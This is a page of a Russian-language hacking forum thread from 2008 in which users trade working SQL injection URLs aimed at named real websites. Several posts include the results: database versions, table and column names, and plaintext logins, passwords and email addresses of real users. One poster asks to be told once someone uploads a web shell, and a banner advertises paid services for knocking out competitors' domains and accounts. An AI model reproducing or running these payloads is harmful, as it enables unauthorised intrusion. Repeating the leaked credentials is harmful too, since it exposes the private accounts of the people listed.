Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 668 из 1242

668

Опции темы

Поиск в этой теме

Опции просмотра

#6671

27.09.2008, 12:44

UID: 46770
USER: iddqd

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

knock.lv - интернет-магазин.

5.0.51a-community:knok_knock@localhost:knok_knock

Код:

http://www.knock.lv/view_more.php?action=view_s&product_id=269+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10+from+users--

#6672

27.09.2008, 13:45

UID: 27431
USER: $n@ke

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

www.migranews.it PR 6

Цитата:

http://www.migranews.it/stampaart.php?indice=729[sql]

Version: 5.0.67
Dbname: migranews_it
Username: 75239472@domweb-4.eu.tiscali.sys

Цитата:

table login

migra : prova

#6673

27.09.2008, 14:17

UID: 50753
USER: luz3r

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Код:

http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables--

#6674

27.09.2008, 14:40

UID: 50753
USER: luz3r

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Цитата:

http://www.vzmakh.ru/b_sh/fotki1.php?novost=-1+UNION+SELECT+1,user()--

dbu_vzmakh_2@192.168.7.97

Цитата:

http://www.vzmakh.ru/b_sh/fotki1.php?novost=-1+UNION+SELECT+1,version()--

4.1.22

#6675

27.09.2008, 14:58

UID: 50753
USER: luz3r

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Цитата:

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+uni on+select+1,2,3,4,table_name,6,7,8,9,10,11+from+in formation_schema.tables+limit+1,1--

- COLLATIONS
- COLLATION_CHARACTER_SET_APPLICABILITY
- COLUMNS
- COLUMN_PRIVILEGES
- ENGINES
- EVENTS
- FILES
- GLOBAL_STATUS
- GLOBAL_VARIABLES
- KEY_COLUMN_USAGE
- PARTITIONS
- PLUGINS
- PROCESSLIST
- REFERENTIAL_CONSTRAINTS
...
- USERS

Цитата:

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+uni on+select+1,2,3,4,column_name,6,7,8,9,10,11+from+i nformation_schema.columns+where+table_name=0x75736 57273+limit+1,1--

А вот и поля.. :
- login
- passwd
- fio
- fname
- ffname
- sname
- company
- dolj
- sex
- country
- region
- address
- telephone
- fax
- email
- url
дальше не стал...

Цитата:

http://www.bis-el.kiev.ua/start.php?parent_id=0&part_id=1&article_id=230+uni on+select+1,2,3,4,concat_ws(0x3a,login,passwd,emai l),6,7,8,9,10,11+from+users+limit+1,1--

Пароли в открытом виде...
Приведу парочку

Цитата:

№ login : pass : mail

1) Bear:igor2001:igor@bis-el.kiev.ua
2) pavel_m@bis-el.kiev.ua

asha:уже писал - (тут логин и есть мыло)
3) artemk:234:artemk@bis-el.kiev.ua
4) Alex:king:alexander@bis-el.kiev.ua

Авторизация тут

#6676

27.09.2008, 15:24

UID: 50753
USER: luz3r

~~luz3r~~

Banned

Регистрация: 23.02.2008

Сообщений: 268

Провел на форуме:
3103600

Репутация: 850

Цитата:

http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,version(),3,4,5,6,7,8,9/*

4.1.22

#6677

27.09.2008, 17:02

UID: 35866
USER: S00pY

S00pY

Познающий

Регистрация: 24.04.2007

Сообщений: 92

Провел на форуме:
2621544

Репутация: 412

Отправить сообщение для S00pY с помощью ICQ

http://www.bt-shop.ru/section_output.php?id=-1+union+select+1,2,3,version(),5,6,7/*
version:4
http://www.intexusa.ru/forum/read.php?id=99999999999+union+select+1,2,3,4,5,6,7--
Нет принтабельных

http://www.lory-press.ru/book.php?id=1+and+substring(@@version,1,1)=3
version:3

#6678

28.09.2008, 02:19

UID: 65503
USER: 3xIm3

3xIm3

Познающий

Регистрация: 19.09.2008

Сообщений: 95

Провел на форуме:
399173

Репутация: 102

Код:

http://www.pku.org/pages/news.php?id...cat_ws(0x3a,pa ssword,email)+FROM+member--

Код:

http://www.snseurope.com/snslink/new...17,18,19,20+fr om+users--

Код:

http://www.stots.edu/article.php?id=...a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1--

#6679

28.09.2008, 03:10

UID: 64698
USER: lstsgoman

lstsgoman

Новичок

Регистрация: 05.09.2008

Сообщений: 3

Провел на форуме:
68503

Репутация: 0

Позходу дела большая бАза рефератов

ТИЦ 350

Цитата:

http://doklad.ru/referat.php?id_ref=-1+union+select+1,2,3,DAT ABASE(),USER(),6,7,8,9,10

ЗЫ. Зальете шелл дайте знать

#6680

28.09.2008, 06:28

UID: 65503
USER: 3xIm3

3xIm3

Познающий

Регистрация: 19.09.2008

Сообщений: 95

Провел на форуме:
399173

Репутация: 102

Код:

http://yogacenter.ru/page.php?id=-2+union+select+table_name,2,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+19,1

Код:

http://www.biblicaltraining.org/class.php?id=-1+union+select+1,2,3,4,concat(firstname,0x3a,passwd,0x3a,lastname,0x3a,email),6,7,8,9,10,11,12,13,14,15,16+FROM+bt_users--

Ed:luke00

ingess:edingess@carolina.rr.com

Страница 668 из 1242

668

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход